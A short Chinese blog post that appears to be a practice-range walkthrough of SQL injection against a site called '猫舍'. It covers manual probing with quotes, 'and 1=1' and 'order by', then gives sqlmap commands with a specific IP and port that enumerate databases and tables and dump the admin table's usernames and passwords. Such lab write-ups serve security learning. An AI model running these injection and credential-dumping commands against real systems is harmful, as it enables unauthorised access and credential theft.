1.首先打开靶场网址查看新闻在id=1后面加个单引号出现错误看不到内容
2.在用adn 1=1 显示正常 adn 1=2 显示错误,所以是存在注入的
3.然后在来差注入点 先order by 10 显示错误
4.直到order by 2 才显示正常,注入点为2
5.查一下有多少个字段,查出有两个字段
6.再查一下数据库版本7.爆出数据库名8.接下来查询表名9.最后查询密码10.sqlmap工具注入,sqlmap.py -u"http://120.203.13.75:6815/?id=1"发现能够注入
11.sqlmap.py -u"http://120.203.13.75:6815/?id=1" --dbs 找出库名
12.查到有2个库,第一个为系统库,第二个就是猫舍的库直接列出猫舍所有表 sqlmap.py -u"http://120.203.13.75:6815/?id=1" --tables -D"maoshe"
13.看到有4个表,一般管理员密码都在ADMIN表中所以查表中的字段sqlmap.py -u"http://120.203.13.75:6815/?id=1" --columns -D"maoshe" -T"admin"
14.直接输出账号密码 sqlmap.py -u"http://120.203.13.75:6815/?id=1" --dump -D"maoshe" -T"admin" -C"username,password"
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.